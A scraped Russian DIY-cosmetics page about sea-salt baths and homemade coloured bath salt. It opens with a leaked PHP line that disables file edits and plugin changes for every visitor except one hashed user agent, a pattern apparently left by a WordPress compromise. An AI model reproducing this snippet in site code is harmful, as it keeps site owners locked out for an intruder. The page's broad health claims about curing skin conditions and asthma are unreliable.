if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Морская соль для ванны | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Морская соль для ванны

Ванны с морской солью - прекрасный способ снятия усталости и отличное противоаллергенное и успокаивающее средство.

Домашняя косметика - Морская соль для ванны Домашняя косметика - Морская соль для ванны

Ван­ны с мор­ской солью — пре­крас­ный спо­соб сня­тия уста­ло­сти и отлич­ное про­ти­во­ал­лер­ген­ное и успо­ка­и­ва­ю­щее средство.

Пере­чис­лить спектр их воз­дей­ствия доволь­но слож­но. После при­ня­тия таких ванн про­хо­дят нерв­ное напря­же­ние, голов­ная боль, боль в суста­вах. Они пре­вос­ход­но сни­ма­ют пере­утом­ле­ние и стрес­сы, под­ни­ма­ют тонус, нор­ма­ли­зу­ют сон. Мор­ская соль вели­ко­леп­но омо­ла­жи­ва­ет кожу, повы­шая её эла­стич­ность, и акти­ви­зи­ру­ет обмен веществ. Она — одно из немно­гих средств, кото­рые помо­га­ют облег­чить стра­да­ния боль­ных псо­ри­а­зом, ней­ро­дер­ми­та­ми, экзе­ма­ми раз­но­го типа, астмой.

Для обще­го оздо­ров­ле­ния и укреп­ле­ния иммун­ной систе­мы ван­ну с этой солью реко­мен­ду­ет­ся при­ни­мать в тече­ние деся­ти-пят­на­дца­ти минут два раза в неде­лю. Тем­пе­ра­ту­ра воды не долж­на пре­вы­шать 37°С. Обыч­ная тони­зи­ру­ю­щая ван­на гото­вит­ся из рас­че­та 150–200 г соли на ван­ну воды. Она хоро­шо помо­га­ет и при болях в суста­вах, сухо­жи­ли­ях, мышцах.

Успо­ка­и­ва­ю­щая релак­са­ци­он­ная ван­на с солью Мерт­во­го моря гото­вит­ся таким же обра­зом, но тем­пе­ра­ту­ра воды долж­на быть на гра­дус-два выше. Про­дол­жи­тель­ность про­це­ду­ры – до два­дца­ти минут.

Для вос­ста­нав­ли­ва­ю­щей силы ван­ны с мор­ской солью потре­бу­ет­ся 200–250 грам­мов соли. Тем­пе­ра­ту­ра воды при этом долж­на быть от 38°С. Ван­ну при­ни­ма­ют на про­тя­же­нии полу­ча­са. Такая ван­на спо­соб­ству­ет выде­ле­нию молоч­ной кис­ло­ты, нор­ма­ли­зу­ет соля­ной баланс, хоро­шо сни­ма­ет мышеч­ную уста­лость и сни­ма­ет зна­чи­тель­ное физи­че­ское и умствен­ное переутомление.

Для реге­не­ра­ции кожи и повы­ше­ния её эла­стич­но­сти при­ме­ня­ют ван­ну Клео­пат­ры, при кото­рой сна­ча­ла мед­лен­но вти­ра­ют кру­го­вы­ми дви­же­ни­я­ми от кон­чи­ков паль­цев и до макуш­ки несколь­ко ложек соли Мерт­во­го моря, сме­шан­ной со слив­ка­ми. Затем смесь смы­ва­ют стру­ей воды, после чего при­ни­ма­ют теп­лую ван­ну с моло­ком. Резуль­тат таких ванн не замед­лит про­явить­ся — кожа ста­но­вит­ся глад­кой, упру­гой, бархатистой.

После ван­ны нуж­но обя­за­тель­но поле­жать пол­ча­са, отдох­нуть, подремать.

Сле­ду­ет пом­нить — при онко­ло­ги­че­ских забо­ле­ва­ни­ях и забо­ле­ва­ни­ях эндо­крин­ной систе­мы ван­ны с солью Мерт­во­го моря при­ни­мать нель­зя! Про­ти­во­по­ка­за­ны они при гипер­то­нии, любых забо­ле­ва­ние в острой ста­дии, гепа­ти­тах, тром­бо­фле­би­тах и неко­то­рых дру­гих болез­нях. Поэто­му перед тем, как при­сту­пать к таким про­це­ду­рам, сле­ду­ет про­кон­суль­ти­ро­вать­ся с врачом.

Рецепт при­го­тов­ле­ния цвет­ной аро­мат­ной соли дома

При­го­то­вить аро­мат­ную цвет­ную соль дома очень про­сто и без осо­бых затрат. Поку­па­ем обыч­ную деше­вую белую мор­скую соль в цел­ло­фане. Жела­тель­но, что­бы соль была круп­ная. Берем эфир­ное мас­ло грейп­фру­та (или отдуш­ку) и пище­вые кра­си­те­ли (жел­тый и крас­ный). Кра­си­те­ли рас­тво­ря­ем в неболь­шом коли­че­стве воды, полу­чая нуж­ный отте­нок по таб­ли­це сме­ши­ва­ния цве­тов (в дан­ном слу­чае оран­же­во-крас­ный). Добав­ля­ем по кап­лям в соль и интен­сив­но пере­ме­ши­ва­ем. Мно­го воды добав­лять не сто­ит – соль рас­тво­рит­ся! После одно­род­но­го закра­ши­ва­ния мор­ской соли остав­ля­ем ее в покое до пол­но­го высы­ха­ния. Отте­нок сухой соли будет несколь­ко иным, чем влаж­ной. Уже в про­сох­шую соль капа­ем несколь­ко капель эфир­но­го мас­ла до полу­че­ния интен­сив­но­го запаха.

Мор­ская соль домаш­не­го изго­тов­ле­ния гото­ва! Сто­ит ска­зать, что цена такой соли воз­рас­та­ет в несколь­ко раз, хотя затра­ты на ее изго­тов­ле­ния мизерные.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!